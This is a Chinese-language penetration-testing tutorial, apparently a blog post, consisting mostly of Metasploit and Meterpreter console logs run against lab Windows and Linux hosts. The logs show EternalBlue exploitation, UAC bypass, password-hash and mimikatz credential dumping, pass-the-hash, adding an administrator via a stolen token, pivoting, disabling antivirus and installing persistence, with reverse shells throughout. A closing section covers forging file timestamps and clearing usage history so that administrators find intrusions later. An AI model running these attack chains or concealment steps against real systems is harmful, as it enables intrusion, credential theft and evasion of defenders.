meterpreter >backgroundmsf6exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue[*] No payloadconfigured, defaulting to windows/x64/meterpreter/reverse_tcpmsf6exploit(windows/smb/ms17_010_eternalblue) > useexploit/windows/smb/ms17_010_eternalblue[*] Usingconfigured payload windows/x64/meterpreter/reverse_tcpmsf6exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1SESSION =>1msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168rhost =>192.168.0.168msf6exploit(windows/smb/ms17_010_eternalblue) > exploit

绕过UAC提权

Windows 7

用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。

meterpreter >backgroundmsf6exploit(multi/handler) > use exploit/windows/local/bypassuac[*] No payloadconfigured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/local/bypassuac)> set session 2session => 2msf6exploit(windows/local/bypassuac) > exploit[*] Startedreverse TCP handler on 192.168.0.150:4444[*] UAC isEnabled, checking level...[+] UAC is setto Default[+] BypassUACcan bypass this setting, continuing...…[*] Meterpretersession 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-1915:45:06 +0800meterpreter >getuidServer username:WIN-2VEIIKHJ7M8小铃铛meterpreter >getsystem...got systemvia technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter >getuidServer username:NT AUTHORITYSYSTEMmeterpreter >

触发UAC机制

Windows 10

meterpreter> background[*]Backgrounding session 1...msf6exploit(multi/handler) > use exploit/windows/local/ask[*] No payloadconfigured, defaulting to windows/meterpreter/reverse_tcpmsf6exploit(windows/local/ask) > set session 1session => 1msf6exploit(windows/local/ask) > set filename payload.exefilename =>payload.exemsf6 exploit(windows/local/ask)> exploit[*] Startedreverse TCP handler on 192.168.0.150:4444[*] UAC isEnabled, checking level...[*] The userwill be prompted, wait for them to click 'Ok'[*] Uploadingpayload.exe - 73802 bytes to the filesystem...[*] ExecutingCommand![*] Sendingstage (175686 bytes) to 192.168.0.106[*] Meterpretersession 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-2711:39:52 +0800meterpreter> getsystem...got system via technique 1 (NamedPipe Impersonation (In Memory/Admin)).

获取用户名密码

提取密码哈希值

Windows 10

meterpreter > getsystemmeterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f::: meterpreter > ps | grep lsassFiltering on 'lsass'Process List============ PID  PPID  Name   Arch  Session  User Path ---  ----  ----   ----  -------  ---- ---- 736  644   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:WindowsSystem32lsass.exemeterpreter > migrate 736[*] Migrating from 5724 to 736...[*] Migration completed successfully.meterpreter > load kiwiLoading extension kiwi...'  .#####.   mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  / ##   > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/Success. meterpreter > kiwi_cmd sekurlsa::logonpasswords…SID   : S-1-5-21-2772671008-4265266102-715737954-1001       msv :              [00000003] Primary        * Username : xianggu625@126.com        * Domain   : MicrosoftAccount        * NTLM : 4f151ab2d4afdef65f9664b0422ad83f       tspkg :             wdigest :              * Username : xianggu625@126.com        * Domain   : MicrosoftAccount        * Password : (null)       kerberos :              * Username : xianggu625@126.com        * Domain   : MicrosoftAccount        * Password : (null)       ssp :             credman :             cloudap :      …

重新进入

msf6 exploit(windows/local/ask) > use exploit/multi/handler[*] Using configured payload windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 443msf6 exploit(multi/handler) set rhost 192.168.0.106rhost => 192.168.0.106msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83fSMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4msf6 exploit(multi/handler) exploit[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.106[*] Sending stage (175686 bytes) to 192.168.0.106[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800meterpreter >

Windows7

meterpreter > getsystem[-] Already running as SYSTEMmeterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::meterpreter > ps | grep lsassFiltering on 'lsass'Process List============ PID  PPID  Name   Arch  Session  User Path ---  ----  ----   ----  -------  ---- ---- 512  396   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:Windowssystem32lsass.exemeterpreter > migrate 512[*] Migrating from 1672 to 512...[*] Migration completed successfully.meterpreter > load kiwiLoading extension kiwi...  .#####.   mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  / ##   > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/Success.meterpreter > kiwi_cmd sekurlsa::logonpasswordsAuthentication Id : 0 ; 81005 (00000000:00013c6d)Session   : Interactive from 1User Name :   : WIN-2VEIIKHJ7M8        * LM   : 44efce164ab921caaad3b435b51404ee        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f       tspkg :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       wdigest :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       kerberos :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       ssp :             credman :              [00000000]���  PPgN  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  / ##   > https://blog.gentilkiwi.com/mimikatz '## v ##'   Vincent LE TOUX ( vincent.letoux@gmail.com )  '#####'> https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(powershell) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 81005 (00000000:00013c6d)Session   : Interactive from 1User Name : Ô۔Domain: WIN-2VEIIKHJ7M8Logon Server  : WIN-2VEIIKHJ7M8Logon Time: 2022/6/27 14:58:54SID   : S-1-5-21-2305812133-3308626755-1024735854-1000       msv :              [00000003] Primary        * Username : Ô۔        * Domain   : WIN-2VEIIKHJ7M8        * LM   : 44efce164ab921caaad3b435b51404ee        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f       tspkg :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       wdigest :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       kerberos :              * Username : (null)        *

重新进入

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > set rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.158[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800meterpreter >

令牌假冒添加用户

meterpreter > ps | grep lsassFiltering on 'lsass'Process List============ PID  PPID  Name   Arch  Session  User Path ---  ----  ----   ----  -------  ---- ---- 736  644   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:WindowsSystem32lsass.exe meterpreter > steal_token 736Stolen token with username: NT AUTHORITYSYSTEMmeterpreter > use incognitoLoading extension incognito...Success.meterpreter > list_tokens -uDelegation Tokens Available========================================DESKTOP-9A8VFKBxiangNT AUTHORITYLOCAL SERVICENT AUTHORITYNETWORK SERVICENT AUTHORITYSYSTEMNT SERVICEReportServerWindow ManagerDWM-1Impersonation Tokens Available========================================Font Driver HostUMFD-0Font Driver HostUMFD-1NT AUTHORITYANONYMOUS LOGONNT SERVICEMSSQLFDLauncherNT SERVICEMSSQLSERVERNT SERVICEMSSQLServerOLAPServicemeterpreter > impersonate_token "NT AUTHORITY\SYSTEM"[+] Delegation token available[+] Successfully impersonated user NT AUTHORITYSYSTEMmeterpreter > add_user tom 123456 -h 192.168.0.106[*] Attempting to add user tom to host 192.168.0.106[+] Successfully added usermeterpreter > add_group_user "administrators" tom -h 192.168.0.106…

跳板

目标为安装vsftpd V2.3.4的Linux机器

Windows10->vsftpd V2.3.4的Linux机器

meterpreter >run get_local_subnets[!] Meterpreterscripts are deprecated. Try post/multi/manage/autoroute.[!] Example: runpost/multi/manage/autoroute OPTION=value [...]Local subnet:192.168.0.0/255.255.255.0Local subnet:192.168.5.0/255.255.255.0Local subnet:192.168.81.0/255.255.255.0meterpreter >background[*]Backgrounding session 3...msf6exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3[*] Route addedmsf6exploit(windows/local/ask) > route printIPv4 ActiveRouting Table========================= Subnet             Netmask            Gateway ------             -------            ------- 192.168.0.0        255.255.255.0      Session 3[*] There arecurrently no IPv6 routes defined.msf6exploit(windows/smb/ms17_010_eternalblue) > useexploit/unix/ftp/vsftpd_234_backdoor[*] No payloadconfigured, defaulting to cmd/unix/interactmsf6exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interactpayload =>cmd/unix/interactmsf6exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171rhost =>192.168.0.171sf6exploit(unix/ftp/vsftpd_234_backdoor) > exploit[*]192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)[*]192.168.0.171:21 - USER: 331 Please specify the password.[+]192.168.0.171:21 - Backdoor service has been spawned, handling...[+]192.168.0.171:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Commandshell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 viasession 3) at 2022-07-19 17:00:32 +0800

使用Meterpreter运行脚本

运行VNC

Windows 10

meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:UsersxiangAppDataLocalTempeiISyc.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.0.150:4545...[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.到windows里面运行C:UsersxiangAppDataLocalTempeiISyc.exe会看到效果meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensionsNo authentication neededAuthentication successfulDesktop name "desktop-9a8vfkb"VNC server default format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Using default colormap which is TrueColor.  Pixel format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Same machine: preferring raw encoding

Windows 7

meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:WindowsTEMPYNpMWsIZ.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.0.150:4545...meterpreter > Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensionsNo authentication neededAuthentication successful[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800Desktop name "win-2veiikhj7m8"VNC server default format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Using default colormap which is TrueColor.  Pixel format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Same machine: preferring raw encoding

迁移进程

meterpreter > run post/windows/manage/migrate[*] Running module against DESKTOP-9A8VFKB[*] Current server process: payload.exe (8716)[*] Spawning notepad.exe process to migrate into[*] Spoofing PPID 0[*] Migrating into 9944[+] Successfully migrated into process 9944

关闭杀毒软件

meterpreter > run killav[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.[!] Example: run post/windows/manage/killav OPTION=value [...][*] Killing Antivirus services on the target...

获取系统密码哈希值

meterpreter > run hashdump[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...][*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...[*] Obtaining the user list and keys...[*] Decrypting user keys...[-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …

所以改用

meterpreter > run post/windows/gather/smart_hashdump[*] Running module against DESKTOP-9A8VFKB[*] Hashes will be saved to the database if one is connected.[+] Hashes will be saved in loot in JtR password file format to:[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt[*] Dumping password hashes...[*] Running as SYSTEM extracting hashes from registry[*]        Obtaining the boot key...[*]        Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...[*]        Obtaining the user list and keys...[*]        Decrypting user keys...[*]        Dumping password hints...[*]        No users with password hints on this system[*]        Dumping password hashes...[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]        xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]        tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

或

meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

获取目标机上流量

目标机必须支持:rpcapd service,在Windows上安装winpcap即可

meterpreter > run post/windows/manage/rpcapd_start[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)[*] Setting rpcapd as 'auto' service[*] Enabling rpcapd.exe in Windows Firewall[*] Installing rpcap in PASSIVE mode (local port: 2002)[+] Rpcapd started successfully: C:Program Files (x86)winpcaprpcapd.exe -d -p 2002 -n

获取系统信息

Windows 10

meterpreter >run scraper[*] New session on 192.168.0.106:7216...[*] Gathering basic system information...[-] Failed to run command net view[-] Error: Rex::TimeoutError Operation timed out.[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:UsersxiangAppDataLocalTempWLNUaYcc.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[-] Failed to run command reg.exe export HKLM C:UsersxiangAppDataLocalTempIymTDekJ.reg[-] Error: Rex::TimeoutError Operation timed out.[*]  Downloading HKLM (C:UsersxiangAppDataLocalTempIymTDekJ.reg)[*] Exception: Rex::Post::

Windows 7

meterpreter > run scraper[*] New session on 192.168.0.158:445...[*] Gathering basic system information...[*] Dumping password hashes...[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:WindowsTEMPsbOwIdlG.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[*]  Downloading HKLM (C:WindowsTEMPpQzbPtfD.reg)[*]  Cleaning HKLM[*]  Exporting HKCC[*]  Downloading HKCC (C:WindowsTEMPxdgVency.reg)[*]  Cleaning HKCC[*]  Exporting HKCR[*]  Downloading HKCR (C:WindowsTEMPaWoyKSRV.reg)[*]  Cleaning HKCR[*]  Exporting HKU[*]  Downloading HKU (C:WindowsTEMPabgTRNGl.reg)[*]  Cleaning HKU[*] Completed processing on 192.168.0.158:445...

Windows 2003

meterpreter > getsystem...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > run scraper[*] New session on 192.168.0.169:1438...[*] Gathering basic system information...[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:DOCUME~1ADMINI~1LOCALS~1TempIatUIdPZ.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[*]  Downloading HKLM (C:DOCUME~1ADMINI~1LOCALS~1TempJcjKKLfF.reg)[*]  Cleaning HKLM[*]  Exporting HKCC[*]  Downloading HKCC (C:DOCUME~1ADMINI~1LOCALS~1TempgLgAxVWq.reg)[*]  Cleaning HKCC[*]  Exporting HKCR[*]  Downloading HKCR (C:DOCUME~1ADMINI~1LOCALS~1TempKDJAycay.reg)[*]  Cleaning HKCR[*]  Exporting HKU[*]  Downloading HKU (C:DOCUME~1ADMINI~1LOCALS~1TempzebuwlsT.reg)[*]  Cleaning HKU[*] Completed processing on 192.168.0.169:1438...

控制持久化

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106

启动meterpreter:-X

50秒后重连:-i 50

使用端口8888:-p 8888

目的IP 192.168.0.106:-r 192.168.0.106

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.[!] Example: run exploit/windows/local/persistence OPTION=value [...][*] Running Persistence script[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888[*] Persistent agent script is 99674 bytes long[+] Persistent script written to C:WindowsTEMPQQxsjpmT.vbs[*] Executing script C:WindowsTEMPQQxsjpmT.vbs[+] Agent executed with PID 2580[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunMdedIPrvpFMB[+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunMdedIPrvpFMB

Windows7成功

将命令行shell升级为Metewrpreter

msf6> use exploit/windows/smb/ms17_010_eternalblue[*] Using configured payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z

-z:攻击成功,在后台,不进入

[*] Started reverse TCP handler on 192.168.0.150:4444[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)[+] 192.168.0.158:445 - The target is vulnerable.[*] 192.168.0.158:445 - Connecting to target for exploitation.[+] 192.168.0.158:445 - Connection established for exploitation.[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet[*] 192.168.0.158:445 - Starting non-paged pool grooming[+] 192.168.0.158:445 - Sending SMBv2 buffers[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.158:445 - Sending final SMBv2 buffers.[*] 192.168.0.158:445 - Sending last fragment of exploit packet![*] 192.168.0.158:445 - Receiving response from exploit packet[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.0.158:445 - Sending egg to corrupted connection.[*] 192.168.0.158:445 - Triggering free of corrupted buffer.[*] Sending stage (200774 bytes) to 192.168.0.158[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[*] Session 3 created in the background.msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3[-] Unknown command: sessionmsf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3][*] Upgrading session ID: 3[*] Starting exploit/multi/handler[*] Started reverse TCP handler on 192.168.0.150:4433msf6 exploit(windows/smb/ms17_010_eternalblue) >[*] Sending stage (200774 bytes) to 192.168.0.158[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800[*] Stopping exploit/multi/handlermsf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4[*] Starting interaction with 4...*/meterpreter >meterpreter > irb[*] Starting IRB shell...[*] You are in the "client" (session) objectirb: warn: can't alias kill from irb_kill.>> fs.dir.pwd=> "C:\Windows\system32"

对IE浏览器激光漏洞进行渗透利用

Windows XP

msf6 > use exploit/windows/browser/ms10_002_aurora[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > show optionsModule options (exploit/windows/browser/ms10_002_aurora):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.   SRVPORT  8080             yes       The local port to listen on.   SSL      false            no        Negotiate SSL for incoming connections   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                   no        The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Automaticmsf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80SRVPORT => 80msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /URIPATH => /msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443lport => 443msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.0.150:443[*] Using URL: http://192.168.0.150/[*] Server started.msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

抹杀记录

当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!

我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。

最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。

Windows

PowerShell修改时间命令

$(DATE) 表示当前日期和时间;

(Get-Date) 同(DATE),表示当前日期和时间;

$(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间;

$(Get-Item abc.txt) 表示获取文件的句柄;

$(Get-Item abc.txt).creationtime 获取文件创建时间

$(Get-Item abc.txt).lastaccesstime 获取文件最后访问时间

$(Get-Item abc.txt).lastwritetime 获取文件修改时间

# 设置文件test.txt的时间为当前时间

(Get-Item abc.txt).creationtime=(DATE)

(Get-Item abc.txt).lastaccesstime=(DATE)

(Get-Item abc.txt).lastwritetime=(DATE)

# 设置文件abc.txt的时间为指定的某个时间

(Get-Item abc.txt).creationtime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastaccesstime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastwritetime=(Get-Date "11/04/2019 20:42:23")

其他记录

清理“运行”中的历史记录

• 开始菜单中的“运行”菜单里保存着我们通过它运行过的程序及所打开的文件路径与名称。
• 进入注册表编辑器,找到HKEY_CURRENT_ USERSortwareMicrosoftWindowsCurrentversionEsploierRunmru分支。从中选择不需要的或不想要别人看到的记录删除即可。

清理“查找”中的历史记录

• (1)、清理查找计算机的历史记录
• 进入注册表编辑器,找到HKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru5647分支,选择不需要的或是不想让别人看到的记录删除即可。
• (2)清理查找文件的历史记录

进入注册表编辑器,找到HKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru5603分支,从中选择不需要的或是不想让别人看到的记录删除即可。

清理“我最近的文档”中的历史记录

• 在任务栏上右单击,打开“任务栏和开始菜单属性”对话框。单击“开始菜单”“自定义”“高级”,单击“清理”按钮即可清理最近访问过的全部文档。如图2。
• 如果只想删除自己的记录,可以进入资源管理器中的“C:Documentsnnd SettingsAdminnisyror(用户自己的帐号)Recent”文件夹,删去自己不想要别人看到的文档即可。

禁止显示上一次登录者的名称

进入注册表编辑器,找到HKEY_ LOCAL_ MACHINE Software Microsoft windowsNT Currentversion Winlogin 分支,新建一个“DontDisplayLastUserName”的字符串值,并设为“1”,重新启动后,就再不会显示上次登录的用户名了,当需要显示上次登录的用户名时设为“0”即可。

清理“回收站”

• 在windows中简单地删除文件只是将文件转移到了“回收站”中,随时可以恢复查看。比较保险的做法是按住shift再点“删除”,或右击桌面上的“回收站”,选择“属性”,在“全局”选项卡中选择“所有驱动器均使用同一设置”,然后勾选下方的“删除时不将文件移回回收站,而是直接删除”,单击“确定”。

清理剪切板中的记录

